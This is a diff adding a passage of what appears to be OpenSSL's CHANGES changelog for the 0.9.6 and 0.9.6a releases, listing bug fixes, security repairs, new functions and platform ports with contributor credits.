+     Otherwise while one thread is in ssleay_rand_bytes (which sets the
+     flag), *other* threads can enter ssleay_add_bytes without obeying
+     the CRYPTO_LOCK_RAND lock (and may even illegally release the lock
+     that they do not hold after the first thread unsets add_do_not_lock).
+     [Bodo Moeller]
+
+  *) Change bctest again: '-x' expressions are not available in all
+     versions of 'test'.
+     [Bodo Moeller]
+
+ Changes between 0.9.6 and 0.9.6a  [5 Apr 2001]
+
+  *) Fix a couple of memory leaks in PKCS7_dataDecode()
+     [Steve Henson, reported by Heyun Zheng <hzheng@atdsprint.com>]
+
+  *) Change Configure and Makefiles to provide EXE_EXT, which will contain
+     the default extension for executables, if any.  Also, make the perl
+     scripts that use symlink() to test if it really exists and use "cp"
+     if it doesn't.  All this made OpenSSL compilable and installable in
+     CygWin.
+     [Richard Levitte]
+
+  *) Fix for asn1_GetSequence() for indefinite length constructed data.
+     If SEQUENCE is length is indefinite just set c->slen to the total
+     amount of data available.
+     [Steve Henson, reported by shige@FreeBSD.org]
+     [This change does not apply to 0.9.7.]
+
+  *) Change bctest to avoid here-documents inside command substitution
+     (workaround for FreeBSD /bin/sh bug).
+     For compatibility with Ultrix, avoid shell functions (introduced
+     in the bctest version that searches along $PATH).
+     [Bodo Moeller]
+
+  *) Rename 'des_encrypt' to 'des_encrypt1'.  This avoids the clashes
+     with des_encrypt() defined on some operating systems, like Solaris
+     and UnixWare.
+     [Richard Levitte]
+
+  *) Check the result of RSA-CRT (see D. Boneh, R. DeMillo, R. Lipton:
+     On the Importance of Eliminating Errors in Cryptographic
+     Computations, J. Cryptology 14 (2001) 2, 101-119,
+     http://theory.stanford.edu/~dabo/papers/faults.ps.gz).
+     [Ulf Moeller]
+  
+  *) MIPS assembler BIGNUM division bug fix. 
+     [Andy Polyakov]
+
+  *) Disabled incorrect Alpha assembler code.
+     [Richard Levitte]
+
+  *) Fix PKCS#7 decode routines so they correctly update the length
+     after reading an EOC for the EXPLICIT tag.
+     [Steve Henson]
+     [This change does not apply to 0.9.7.]
+
+  *) Fix bug in PKCS#12 key generation routines. This was triggered
+     if a 3DES key was generated with a 0 initial byte. Include
+     PKCS12_BROKEN_KEYGEN compilation option to retain the old
+     (but broken) behaviour.
+     [Steve Henson]
+
+  *) Enhance bctest to search for a working bc along $PATH and print
+     it when found.
+     [Tim Rice <tim@multitalents.net> via Richard Levitte]
+
+  *) Fix memory leaks in err.c: free err_data string if necessary;
+     don't write to the wrong index in ERR_set_error_data.
+     [Bodo Moeller]
+
+  *) Implement ssl23_peek (analogous to ssl23_read), which previously
+     did not exist.
+     [Bodo Moeller]
+
+  *) Replace rdtsc with _emit statements for VC++ version 5.
+     [Jeremy Cooper <jeremy@baymoo.org>]
+
+  *) Make it possible to reuse SSLv2 sessions.
+     [Richard Levitte]
+
+  *) In copy_email() check for >= 0 as a return value for
+     X509_NAME_get_index_by_NID() since 0 is a valid index.
+     [Steve Henson reported by Massimiliano Pala <madwolf@opensca.org>]
+
+  *) Avoid coredump with unsupported or invalid public keys by checking if
+     X509_get_pubkey() fails in PKCS7_verify(). Fix memory leak when
+     PKCS7_verify() fails with non detached data.
+     [Steve Henson]
+
+  *) Don't use getenv in library functions when run as setuid/setgid.
+     New function OPENSSL_issetugid().
+     [Ulf Moeller]
+
+  *) Avoid false positives in memory leak detection code (crypto/mem_dbg.c)
+     due to incorrect handling of multi-threading:
+
+     1. Fix timing glitch in the MemCheck_off() portion of CRYPTO_mem_ctrl().
+
+     2. Fix logical glitch in is_MemCheck_on() aka CRYPTO_is_mem_check_on().
+
+     3. Count how many times MemCheck_off() has been called so that
+        nested use can be treated correctly.  This also avoids 
+        inband-signalling in the previous code (which relied on the
+        assumption that thread ID 0 is impossible).
+     [Bodo Moeller]
+
+  *) Add "-rand" option also to s_client and s_server.
+     [Lutz Jaenicke]
+
+  *) Fix CPU detection on Irix 6.x.
+     [Kurt Hockenbury <khockenb@stevens-tech.edu> and
+      "Bruce W. Forsberg" <bruce.forsberg@baesystems.com>]
+
+  *) Fix X509_NAME bug which produced incorrect encoding if X509_NAME
+     was empty.
+     [Steve Henson]
+     [This change does not apply to 0.9.7.]
+
+  *) Use the cached encoding of an X509_NAME structure rather than
+     copying it. This is apparently the reason for the libsafe "errors"
+     but the code is actually correct.
+     [Steve Henson]
+
+  *) Add new function BN_rand_range(), and fix DSA_sign_setup() to prevent
+     Bleichenbacher's DSA attack.
+     Extend BN_[pseudo_]rand: As before, top=1 forces the highest two bits
+     to be set and top=0 forces the highest bit to be set; top=-1 is new
+     and leaves the highest bit random.
+     [Ulf Moeller, Bodo Moeller]
+
+  *) In the NCONF_...-based implementations for CONF_... queries
+     (crypto/conf/conf_lib.c), if the input LHASH is NULL, avoid using
+     a temporary CONF structure with the data component set to NULL
+     (which gives segmentation faults in lh_retrieve).
+     Instead, use NULL for the CONF pointer in CONF_get_string and
+     CONF_get_number (which may use environment variables) and directly
+     return NULL from CONF_get_section.
+     [Bodo Moeller]
+
+  *) Fix potential buffer overrun for EBCDIC.
+     [Ulf Moeller]
+
+  *) Tolerate nonRepudiation as being valid for S/MIME signing and certSign
+     keyUsage if basicConstraints absent for a CA.
+     [Steve Henson]
+
+  *) Make SMIME_write_PKCS7() write mail header values with a format that
+     is more generally accepted (no spaces before the semicolon), since
+     some programs can't parse those values properly otherwise.  Also make
+     sure BIO's that break lines after each write do not create invalid
+     headers.
+     [Richard Levitte]
+
+  *) Make the CRL encoding routines work with empty SEQUENCE OF. The
+     macros previously used would not encode an empty SEQUENCE OF
+     and break the signature.
+     [Steve Henson]
+     [This change does not apply to 0.9.7.]
+
+  *) Zero the premaster secret after deriving the master secret in
+     DH ciphersuites.
+     [Steve Henson]
+
+  *) Add some EVP_add_digest_alias registrations (as found in
+     OpenSSL_add_all_digests()) to SSL_library_init()
+     aka OpenSSL_add_ssl_algorithms().  This provides improved
+     compatibility with peers using X.509 certificates
+     with unconventional AlgorithmIdentifier OIDs.
+     [Bodo Moeller]
+
+  *) Fix for Irix with NO_ASM.
+     ["Bruce W. Forsberg" <bruce.forsberg@baesystems.com>]
+
+  *) ./config script fixes.
+     [Ulf Moeller, Richard Levitte]
+
+  *) Fix 'openssl passwd -1'.
+     [Bodo Moeller]
+
+  *) Change PKCS12_key_gen_asc() so it can cope with non null
+     terminated strings whose length is passed in the passlen
+     parameter, for example from PEM callbacks. This was done
+     by adding an extra length parameter to asc2uni().
+     [Steve Henson, reported by <oddissey@samsung.co.kr>]
+
+  *) Fix C code generated by 'openssl dsaparam -C': If a BN_bin2bn
+     call failed, free the DSA structure.
+     [Bodo Moeller]
+
+  *) Fix to uni2asc() to cope with zero length Unicode strings.
+     These are present in some PKCS#12 files.
+     [Steve Henson]
+
+  *) Increase s2->wbuf allocation by one byte in ssl2_new (ssl/s2_lib.c).
+     Otherwise do_ssl_write (ssl/s2_pkt.c) will write beyond buffer limits
+     when writing a 32767 byte record.
+     [Bodo Moeller; problem reported by Eric Day <eday@concentric.net>]
+
+  *) In RSA_eay_public_{en,ed}crypt and RSA_eay_mod_exp (rsa_eay.c),
+     obtain lock CRYPTO_LOCK_RSA before setting rsa->_method_mod_{n,p,q}.
+
+     (RSA objects have a reference count access to which is protected
+     by CRYPTO_LOCK_RSA [see rsa_lib.c, s3_srvr.c, ssl_cert.c, ssl_rsa.c],
+     so they are meant to be shared between threads.)
+     [Bodo Moeller, Geoff Thorpe; original patch submitted by
+     "Reddie, Steven" <Steven.Reddie@ca.com>]
+
+  *) Fix a deadlock in CRYPTO_mem_leaks().
+     [Bodo Moeller]
+
+  *) Use better test patterns in bntest.
+     [Ulf Möller]
+
+  *) rand_win.c fix for Borland C.
+     [Ulf Möller]
+ 
+  *) BN_rshift bugfix for n == 0.
+     [Bodo Moeller]
+
+  *) Add a 'bctest' script that checks for some known 'bc' bugs
+     so that 'make test' does not abort just because 'bc' is broken.
+     [Bodo Moeller]
+
+  *) Store verify_result within SSL_SESSION also for client side to
+     avoid potential security hole. (Re-used sessions on the client side
+     always resulted in verify_result==X509_V_OK, not using the original
+     result of the server certificate verification.)
+     [Lutz Jaenicke]
+
+  *) Fix ssl3_pending: If the record in s->s3->rrec is not of type
+     SSL3_RT_APPLICATION_DATA, return 0.
+     Similarly, change ssl2_pending to return 0 if SSL_in_init(s) is true.
+     [Bodo Moeller]
+
+  *) Fix SSL_peek:
+     Both ssl2_peek and ssl3_peek, which were totally broken in earlier
+     releases, have been re-implemented by renaming the previous
+     implementations of ssl2_read and ssl3_read to ssl2_read_internal
+     and ssl3_read_internal, respectively, and adding 'peek' parameters
+     to them.  The new ssl[23]_{read,peek} functions are calls to
+     ssl[23]_read_internal with the 'peek' flag set appropriately.
+     A 'peek' parameter has also been added to ssl3_read_bytes, which
+     does the actual work for ssl3_read_internal.
+     [Bodo Moeller]
+
+  *) Initialise "ex_data" member of RSA/DSA/DH structures prior to calling
+     the method-specific "init()" handler. Also clean up ex_data after
+     calling the method-specific "finish()" handler. Previously, this was
+     happening the other way round.
+     [Geoff Thorpe]
+
+  *) Increase BN_CTX_NUM (the number of BIGNUMs in a BN_CTX) to 16.
+     The previous value, 12, was not always sufficient for BN_mod_exp().
+     [Bodo Moeller]
+
+  *) Make sure that shared libraries get the internal name engine with
+     the full version number and not just 0.  This should mark the
+     shared libraries as not backward compatible.  Of course, this should
+     be changed again when we can guarantee backward binary compatibility.
+     [Richard Levitte]
+
+  *) Fix typo in get_cert_by_subject() in by_dir.c
+     [Jean-Marc Desperrier <jean-marc.desperrier@certplus.com>]
+
+  *) Rework the system to generate shared libraries:
+
+     - Make note of the expected extension for the shared libraries and
+       if there is a need for symbolic links from for example libcrypto.so.0
+       to libcrypto.so.0.9.7.  There is extended info in Configure for
+       that.
+
+     - Make as few rebuilds of the shared libraries as possible.
+
+     - Still avoid linking the OpenSSL programs with the shared libraries.
+
+     - When installing, install the shared libraries separately from the
+       static ones.
+     [Richard Levitte]
+
+  *) Fix SSL_CTX_set_read_ahead macro to actually use its argument.
+
+     Copy SSL_CTX's read_ahead flag to SSL object directly in SSL_new
+     and not in SSL_clear because the latter is also used by the
+     accept/connect functions; previously, the settings made by
+     SSL_set_read_ahead would be lost during the handshake.
+     [Bodo Moeller; problems reported by Anders Gertz <gertz@epact.se>]     
+
+  *) Correct util/mkdef.pl to be selective about disabled algorithms.
+     Previously, it would create entries for disableed algorithms no
+     matter what.
+     [Richard Levitte]
+
+  *) Added several new manual pages for SSL_* function.
+     [Lutz Jaenicke]
+
+ Changes between 0.9.5a and 0.9.6  [24 Sep 2000]
+
+  *) In ssl23_get_client_hello, generate an error message when faced
+     with an initial SSL 3.0/TLS record that is too small to contain the
+     first two bytes of the ClientHello message, i.e. client_version.
+     (Note that this is a pathologic case that probably has never happened
+     in real life.)  The previous approach was to use the version number
+     from the record header as a substitute; but our protocol choice
+     should not depend on that one because it is not authenticated
+     by the Finished messages.
+     [Bodo Moeller]
+
+  *) More robust randomness gathering functions for Windows.
+     [Jeffrey Altman <jaltman@columbia.edu>]
+
+  *) For compatibility reasons if the flag X509_V_FLAG_ISSUER_CHECK is
+     not set then we don't setup the error code for issuer check errors
+     to avoid possibly overwriting other errors which the callback does
+     handle. If an application does set the flag then we assume it knows
+     what it is doing and can handle the new informational codes
+     appropriately.
+     [Steve Henson]
+
+  *) Fix for a nasty bug in ASN1_TYPE handling. ASN1_TYPE is used for
+     a general "ANY" type, as such it should be able to decode anything
+     including tagged types. However it didn't check the class so it would
+     wrongly interpret tagged types in the same way as their universal
+     counterpart and unknown types were just rejected. Changed so that the
+     tagged and unknown types are handled in the same way as a SEQUENCE:
+     that is the encoding is stored intact. There is also a new type
+     "V_ASN1_OTHER" which is used when the class is not universal, in this
+     case we have no idea what the actual type is so we just lump them all
+     together.
+     [Steve Henson]
+
+  *) On VMS, stdout may very well lead to a file that is written to
+     in a record-oriented fashion.  That means that every write() will
+     write a separate record, which will be read separately by the
+     programs trying to read from it.  This can be very confusing.
+
+     The solution is to put a BIO filter in the way that will buffer
+     text until a linefeed is reached, and then write everything a
+     line at a time, so every record written will be an actual line,
+     not chunks of lines and not (usually doesn't happen, but I've
+     seen it once) several lines in one record.  BIO_f_linebuffer() is
+     the answer.
+
+     Currently, it's a VMS-only method, because that's where it has
+     been tested well enough.
+     [Richard Levitte]
+
+  *) Remove 'optimized' squaring variant in BN_mod_mul_montgomery,
+     it can return incorrect results.
+     (Note: The buggy variant was not enabled in OpenSSL 0.9.5a,
+     but it was in 0.9.6-beta[12].)
+     [Bodo Moeller]
+
+  *) Disable the check for content being present when verifying detached
+     signatures in pk7_smime.c. Some versions of Netscape (wrongly)
+     include zero length content when signing messages.
+     [Steve Henson]
+
+  *) New BIO_shutdown_wr macro, which invokes the BIO_C_SHUTDOWN_WR
+     BIO_ctrl (for BIO pairs).
+     [Bodo Möller]
+
+  *) Add DSO method for VMS.
+     [Richard Levitte]
+
+  *) Bug fix: Montgomery multiplication could produce results with the
+     wrong sign.
+     [Ulf Möller]
+
+  *) Add RPM specification openssl.spec and modify it to build three
+     packages.  The default package contains applications, application
+     documentation and run-time libraries.  The devel package contains
+     include files, static libraries and function documentation.  The
+     doc package contains the contents of the doc directory.  The original
+     openssl.spec was provided by Damien Miller <djm@mindrot.org>.
+     [Richard Levitte]
+     
+  *) Add a large number of documentation files for many SSL routines.
+     [Lutz Jaenicke <Lutz.Jaenicke@aet.TU-Cottbus.DE>]
+
+  *) Add a configuration entry for Sony News 4.
+     [NAKAJI Hiroyuki <nakaji@tutrp.tut.ac.jp>]
+
+  *) Don't set the two most significant bits to one when generating a
+     random number < q in the DSA library.
+     [Ulf Möller]
+
+  *) New SSL API mode 'SSL_MODE_AUTO_RETRY'.  This disables the default
+     behaviour that SSL_read may result in SSL_ERROR_WANT_READ (even if
+     the underlying transport is blocking) if a handshake took place.
+     (The default behaviour is needed by applications such as s_client
+     and s_server that use select() to determine when to use SSL_read;
+     but for applications that know in advance when to expect data, it
+     just makes things more complicated.)
+     [Bodo Moeller]
+
+  *) Add RAND_egd_bytes(), which gives control over the number of bytes read
+     from EGD.
+     [Ben Laurie]
+
+  *) Add a few more EBCDIC conditionals that make `req' and `x509'
+     work better on such systems.
+     [Martin Kraemer <Martin.Kraemer@MchP.Siemens.De>]
+
+  *) Add two demo programs for PKCS12_parse() and PKCS12_create().
+     Update PKCS12_parse() so it copies the friendlyName and the
+     keyid to the certificates aux info.
+     [Steve Henson]
+
+  *) Fix bug in PKCS7_verify() which caused an infinite loop
+     if there was more than one signature.
+     [Sven Uszpelkat <su@celocom.de>]
+
+  *) Major change in util/mkdef.pl to include extra information
+     about each symbol, as well as presentig variables as well
+     as functions.  This change means that there's n more need
+     to rebuild the .num files when some algorithms are excluded.
+     [Richard Levitte]
+
+  *) Allow the verify time to be set by an application,
+     rather than always using the current time.
+     [Steve Henson]
+  
+  *) Phase 2 verify code reorganisation. The certificate
+     verify code now looks up an issuer certificate by a
+     number of criteria: subject name, authority key id
+     and key usage. It also verifies self signed certificates
+     by the same criteria. The main comparison function is
+     X509_check_issued() which performs these checks.
+ 
+     Lot of changes were necessary in order to support this
+     without completely rewriting the lookup code.
+ 
+     Authority and subject key identifier are now cached.
+ 
+     The LHASH 'certs' is X509_STORE has now been replaced
+     by a STACK_OF(X509_OBJECT). This is mainly because an
+     LHASH can't store or retrieve multiple objects with
+     the same hash value.
+
+     As a result various functions (which were all internal
+     use only) have changed to handle the new X509_STORE
+     structure. This will break anything that messed round
+     with X509_STORE internally.
+ 
+     The functions X509_STORE_add_cert() now checks for an
+     exact match, rather than just subject name.
+ 
+     The X509_STORE API doesn't directly support the retrieval
+     of multiple certificates matching a given criteria, however
+     this can be worked round by performing a lookup first
+     (which will fill the cache with candidate certificates)
+     and then examining the cache for matches. This is probably
+     the best we can do without throwing out X509_LOOKUP
+     entirely (maybe later...).
+ 
+     The X509_VERIFY_CTX structure has been enhanced considerably.
+ 
+     All certificate lookup operations now go via a get_issuer()
+     callback. Although this currently uses an X509_STORE it
+     can be replaced by custom lookups. This is a simple way
+     to bypass the X509_STORE hackery necessary to make this
+     work and makes it possible to use more efficient techniques
+     in future. A very simple version which uses a simple
+     STACK for its trusted certificate store is also provided
+     using X509_STORE_CTX_trusted_stack().
+ 
+     The verify_cb() and verify() callbacks now have equivalents
+     in the X509_STORE_CTX structure.
+ 
+     X509_STORE_CTX also has a 'flags' field which can be used
+     to customise the verify behaviour.
+     [Steve Henson]
+ 
+  *) Add new PKCS#7 signing option PKCS7_NOSMIMECAP which 
+     excludes S/MIME capabilities.
+     [Steve Henson]
+
+  *) When a certificate request is read in keep a copy of the
+     original encoding of the signed data and use it when outputing
+     again. Signatures then use the original encoding rather than
+     a decoded, encoded version which may cause problems if the
+     request is improperly encoded.
+     [Steve Henson]
+
+  *) For consistency with other BIO_puts implementations, call
+     buffer_write(b, ...) directly in buffer_puts instead of calling
+     BIO_write(b, ...).
+
+     In BIO_puts, increment b->num_write as in BIO_write.
+     [Peter.Sylvester@EdelWeb.fr]
+
+  *) Fix BN_mul_word for the case where the word is 0. (We have to use
+     BN_zero, we may not return a BIGNUM with an array consisting of
+     words set to zero.)
+     [Bodo Moeller]
+
+  *) Avoid calling abort() from within the library when problems are
+     detected, except if preprocessor symbols have been defined
+     (such as REF_CHECK, BN_DEBUG etc.).
+     [Bodo Moeller]
+
+  *) New openssl application 'rsautl'. This utility can be
+     used for low level RSA operations. DER public key
+     BIO/fp routines also added.
+     [Steve Henson]
+
+  *) New Configure entry and patches for compiling on QNX 4.
+     [Andreas Schneider <andreas@ds3.etech.fh-hamburg.de>]
+
+  *) A demo state-machine implementation was sponsored by
+     Nuron (http://www.nuron.com/) and is now available in
+     demos/state_machine.
+     [Ben Laurie]
+
+  *) New options added to the 'dgst' utility for signature
+     generation and verification.
+     [Steve Henson]
+
+  *) Unrecognized PKCS#7 content types are now handled via a
+     catch all ASN1_TYPE structure. This allows unsupported
+     types to be stored as a "blob" and an application can
+     encode and decode it manually.
+     [Steve Henson]
+
+  *) Fix various signed/unsigned issues to make a_strex.c
+     compile under VC++.
+     [Oscar Jacobsson <oscar.jacobsson@celocom.com>]
+
+  *) ASN1 fixes. i2d_ASN1_OBJECT was not returning the correct
+     length if passed a buffer. ASN1_INTEGER_to_BN failed
+     if passed a NULL BN and its argument was negative.
+     [Steve Henson, pointed out by Sven Heiberg <sven@tartu.cyber.ee>]
+
+  *) Modification to PKCS#7 encoding routines to output definite
+     length encoding. Since currently the whole structures are in
+     memory there's not real point in using indefinite length 
+     constructed encoding. However if OpenSSL is compiled with
+     the flag PKCS7_INDEFINITE_ENCODING the old form is used.
+     [Steve Henson]
+
+  *) Added BIO_vprintf() and BIO_vsnprintf().
+     [Richard Levitte]
+
+  *) Added more prefixes to parse for in the the strings written
+     through a logging bio, to cover all the levels that are available
+     through syslog.  The prefixes are now:
+
+	PANIC, EMERG, EMR	=>	LOG_EMERG
+	ALERT, ALR		=>	LOG_ALERT
+	CRIT, CRI		=>	LOG_CRIT
+	ERROR, ERR		=>	LOG_ERR
+	WARNING, WARN, WAR	=>	LOG_WARNING
+	NOTICE, NOTE, NOT	=>	LOG_NOTICE
+	INFO, INF		=>	LOG_INFO
+	DEBUG, DBG		=>	LOG_DEBUG
+
+     and as before, if none of those prefixes are present at the
+     beginning of the string, LOG_ERR is chosen.
+
+     On Win32, the LOG_* levels are mapped according to this:
+
+	LOG_EMERG, LOG_ALERT, LOG_CRIT, LOG_ERR	=> EVENTLOG_ERROR_TYPE
+	LOG_WARNING				=> EVENTLOG_WARNING_TYPE
+	LOG_NOTICE, LOG_INFO, LOG_DEBUG		=> EVENTLOG_INFORMATION_TYPE
+
+     [Richard Levitte]
+
+  *) Made it possible to reconfigure with just the configuration
+     argument "reconf" or "reconfigure".  The command line arguments
+     are stored in Makefile.ssl in the variable CONFIGURE_ARGS,
+     and are retrieved from there when reconfiguring.
+     [Richard Levitte]
+
+  *) MD4 implemented.
+     [Assar Westerlund <assar@sics.se>, Richard Levitte]
+
+  *) Add the arguments -CAfile and -CApath to the pkcs12 utility.
+     [Richard Levitte]
+
+  *) The obj_dat.pl script was messing up the sorting of object
+     names. The reason was that it compared the quoted version
+     of strings as a result "OCSP" > "OCSP Signing" because
+     " > SPACE. Changed script to store unquoted versions of
+     names and add quotes on output. It was also omitting some
+     names from the lookup table if they were given a default
+     value (that is if SN is missing it is given the same
+     value as LN and vice versa), these are now added on the
+     grounds that if an object has a name we should be able to
+     look it up. Finally added warning output when duplicate
+     short or long names are found.
+     [Steve Henson]
+
+  *) Changes needed for Tandem NSK.
+     [Scott Uroff <scott@xypro.com>]
+
+  *) Fix SSL 2.0 rollback checking: Due to an off-by-one error in
+     RSA_padding_check_SSLv23(), special padding was never detected
+     and thus the SSL 3.0/TLS 1.0 countermeasure against protocol
+     version rollback attacks was not effective.
+
+     In s23_clnt.c, don't use special rollback-attack detection padding
+     (RSA_SSLV23_PADDING) if SSL 2.0 is the only protocol enabled in the
+     client; similarly, in s23_srvr.c, don't do the rollback check if
+     SSL 2.0 is the only protocol enabled in the server.
+     [Bodo Moeller]
+
+  *) Make it possible to get hexdumps of unprintable data with 'openssl
+     asn1parse'.  By implication, the functions ASN1_parse_dump() and
+     BIO_dump_indent() are added.
+     [Richard Levitte]
+
+  *) New functions ASN1_STRING_print_ex() and X509_NAME_print_ex()
+     these print out strings and name structures based on various
+     flags including RFC2253 support and proper handling of
+     multibyte characters. Added options to the 'x509' utility 
+     to allow the various flags to be set.
+     [Steve Henson]
+
+  *) Various fixes to use ASN1_TIME instead of ASN1_UTCTIME.
+     Also change the functions X509_cmp_current_time() and
+     X509_gmtime_adj() work with an ASN1_TIME structure,
+     this will enable certificates using GeneralizedTime in validity
+     dates to be checked.
+     [Steve Henson]
+
+  *) Make the NEG_PUBKEY_BUG code (which tolerates invalid
+     negative public key encodings) on by default,
+     NO_NEG_PUBKEY_BUG can be set to disable it.
+     [Steve Henson]
+
+  *) New function c2i_ASN1_OBJECT() which acts on ASN1_OBJECT
+     content octets. An i2c_ASN1_OBJECT is unnecessary because
+     the encoding can be trivially obtained from the structure.
+     [Steve Henson]
+
+  *) crypto/err.c locking bugfix: Use write locks (CRYPTO_w_[un]lock),
+     not read locks (CRYPTO_r_[un]lock).
+     [Bodo Moeller]
+
+  *) A first attempt at creating official support for shared
+     libraries through configuration.  I've kept it so the
+     default is static libraries only, and the OpenSSL programs
+     are always statically linked for now, but there are
+     preparations for dynamic linking in place.
+     This has been tested on Linux and Tru64.
+     [Richard Levitte]
+
+  *) Randomness polling function for Win9x, as described in:
+     Peter Gutmann, Software Generation of Practically Strong
+     Random Numbers.
+     [Ulf Möller]
+
+  *) Fix so PRNG is seeded in req if using an already existing
+     DSA key.
+     [Steve Henson]
+
+  *) New options to smime application. -inform and -outform
+     allow alternative formats for the S/MIME message including
+     PEM and DER. The -content option allows the content to be
+     specified separately. This should allow things like Netscape
+     form signing output easier to verify.
+     [Steve Henson]
+
+  *) Fix the ASN1 encoding of tags using the 'long form'.
+     [Steve Henson]
+
+  *) New ASN1 functions, i2c_* and c2i_* for INTEGER and BIT
+     STRING types. These convert content octets to and from the
+     underlying type. The actual tag and length octets are
+     already assumed to have been read in and checked. These
+     are needed because all other string types have virtually
+     identical handling apart from the tag. By having versions
+     of the ASN1 functions that just operate on content octets
+     IMPLICIT tagging can be handled properly. It also allows
+     the ASN1_ENUMERATED code to be cut down because ASN1_ENUMERATED
+     and ASN1_INTEGER are identical apart from the tag.
+     [Steve Henson]
+
+  *) Change the handling of OID objects as follows:
+
+     - New object identifiers are inserted in objects.txt, following
+       the syntax given in objects.README.
+     - objects.pl is used to process obj_mac.num and create a new
+       obj_mac.h.
+     - obj_dat.pl is used to create a new obj_dat.h, using the data in
+       obj_mac.h.
+
+     This is currently kind of a hack, and the perl code in objects.pl
+     isn't very elegant, but it works as I intended.  The simplest way
+     to check that it worked correctly is to look in obj_dat.h and
+     check the array nid_objs and make sure the objects haven't moved
+     around (this is important!).  Additions are OK, as well as
+     consistent name changes. 
+     [Richard Levitte]
+
+  *) Add BSD-style MD5-based passwords to 'openssl passwd' (option '-1').
+     [Bodo Moeller]
+
+  *) Addition of the command line parameter '-rand file' to 'openssl req'.
+     The given file adds to whatever has already been seeded into the
+     random pool through the RANDFILE configuration file option or
+     environment variable, or the default random state file.
+     [Richard Levitte]
+
+  *) mkstack.pl now sorts each macro group into lexical order.
+     Previously the output order depended on the order the files
+     appeared in the directory, resulting in needless rewriting
+     of safestack.h .
+     [Steve Henson]
+
+  *) Patches to make OpenSSL compile under Win32 again. Mostly
+     work arounds for the VC++ problem that it treats func() as
+     func(void). Also stripped out the parts of mkdef.pl that
+     added extra typesafe functions: these no longer exist.
+     [Steve Henson]
+
+  *) Reorganisation of the stack code. The macros are now all 
+     collected in safestack.h . Each macro is defined in terms of
+     a "stack macro" of the form SKM_<name>(type, a, b). The 
+     DEBUG_SAFESTACK is now handled in terms of function casts,
+     this has the advantage of retaining type safety without the
+     use of additional functions. If DEBUG_SAFESTACK is not defined
+     then the non typesafe macros are used instead. Also modified the
+     mkstack.pl script to handle the new form. Needs testing to see
+     if which (if any) compilers it chokes and maybe make DEBUG_SAFESTACK
+     the default if no major problems. Similar behaviour for ASN1_SET_OF
+     and PKCS12_STACK_OF.
+     [Steve Henson]
+
+  *) When some versions of IIS use the 'NET' form of private key the
+     key derivation algorithm is different. Normally MD5(password) is
+     used as a 128 bit RC4 key. In the modified case
+     MD5(MD5(password) + "SGCKEYSALT")  is used insted. Added some
+     new functions i2d_RSA_NET(), d2i_RSA_NET() etc which are the same
+     as the old Netscape_RSA functions except they have an additional
+     'sgckey' parameter which uses the modified algorithm. Also added
+     an -sgckey command line option to the rsa utility. Thanks to 
+     Adrian Peck <bertie@ncipher.com> for posting details of the modified
+     algorithm to openssl-dev.
+     [Steve Henson]
+
+  *) The evp_local.h macros were using 'c.##kname' which resulted in
+     invalid expansion on some systems (SCO 5.0.5 for example).
+     Corrected to 'c.kname'.
+     [Phillip Porch <root@theporch.com>]
+
+  *) New X509_get1_email() and X509_REQ_get1_email() functions that return
+     a STACK of email addresses from a certificate or request, these look
+     in the subject name and the subject alternative name extensions and 
+     omit any duplicate addresses.
+     [Steve Henson]
+
+  *) Re-implement BN_mod_exp2_mont using independent (and larger) windows.
+     This makes DSA verification about 2 % faster.
+     [Bodo Moeller]
+
+  *) Increase maximum window size in BN_mod_exp_... to 6 bits instead of 5
+     (meaning that now 2^5 values will be precomputed, which is only 4 KB
+     plus overhead for 1024 bit moduli).
+     This makes exponentiations about 0.5 % faster for 1024 bit
+     exponents (as measured by "openssl speed rsa2048").
+     [Bodo Moeller]
+
+  *) Rename memory handling macros to avoid conflicts with other
+     software:
+          Malloc         =>  OPENSSL_malloc
+          Malloc_locked  =>  OPENSSL_malloc_locked
+          Realloc        =>  OPENSSL_realloc
+          Free           =>  OPENSSL_free
+     [Richard Levitte]
+
+  *) New function BN_mod_exp_mont_word for small bases (roughly 15%
+     faster than BN_mod_exp_mont, i.e. 7% for a full DH exchange).
+     [Bodo Moeller]
+
+  *) CygWin32 support.
+     [John Jarvie <jjarvie@newsguy.com>]
+
+  *) The type-safe stack code has been rejigged. It is now only compiled
+     in when OpenSSL is configured with the DEBUG_SAFESTACK option and
+     by default all type-specific stack functions are "#define"d back to
+     standard stack functions. This results in more streamlined output
+     but retains the type-safety checking possibilities of the original
+     approach.
+     [Geoff Thorpe]
+
+  *) The STACK code has been cleaned up, and certain type declarations
+     that didn't make a lot of sense have been brought in line. This has
+     also involved a cleanup of sorts in safestack.h to more correctly
+     map type-safe stack functions onto their plain stack counterparts.
+     This work has also resulted in a variety of "const"ifications of
+     lots of the code, especially "_cmp" operations which should normally
+     be prototyped with "const" parameters anyway.
+     [Geoff Thorpe]
+
+  *) When generating bytes for the first time in md_rand.c, 'stir the pool'
+     by seeding with STATE_SIZE dummy bytes (with zero entropy count).
+     (The PRNG state consists of two parts, the large pool 'state' and 'md',
+     where all of 'md' is used each time the PRNG is used, but 'state'
+     is used only indexed by a cyclic counter. As entropy may not be
+     well distributed from the beginning, 'md' is important as a
+     chaining variable. However, the output function chains only half
+     of 'md', i.e. 80 bits.  ssleay_rand_add, on the other hand, chains
+     all of 'md', and seeding with STATE_SIZE dummy bytes will result
+     in all of 'state' being rewritten, with the new values depending
+     on virtually all of 'md'.  This overcomes the 80 bit limitation.)
+     [Bodo Moeller]
+
+  *) In ssl/s2_clnt.c and ssl/s3_clnt.c, call ERR_clear_error() when
+     the handshake is continued after ssl_verify_cert_chain();
+     otherwise, if SSL_VERIFY_NONE is set, remaining error codes
+     can lead to 'unexplainable' connection aborts later.
+     [Bodo Moeller; problem tracked down by Lutz Jaenicke]
+
+  *) Major EVP API cipher revision.
+     Add hooks for extra EVP features. This allows various cipher
+     parameters to be set in the EVP interface. Support added for variable
+     key length ciphers via the EVP_CIPHER_CTX_set_key_length() function and
+     setting of RC2 and RC5 parameters.
+
+     Modify EVP_OpenInit() and EVP_SealInit() to cope with variable key length
+     ciphers.
+
+     Remove lots of duplicated code from the EVP library. For example *every*
+     cipher init() function handles the 'iv' in the same way according to the
+     cipher mode. They also all do nothing if the 'key' parameter is NULL and
+     for CFB and OFB modes they zero ctx->num.
+
+     New functionality allows removal of S/MIME code RC2 hack.
+
+     Most of the routines have the same form and so can be declared in terms
+     of macros.
+
+     By shifting this to the top level EVP_CipherInit() it can be removed from
+     all individual ciphers. If the cipher wants to handle IVs or keys
+     differently it can set the EVP_CIPH_CUSTOM_IV or EVP_CIPH_ALWAYS_CALL_INIT
+     flags.
+
+     Change lots of functions like EVP_EncryptUpdate() to now return a
+     value: although software versions of the algorithms cannot fail
+     any installed hardware versions can.
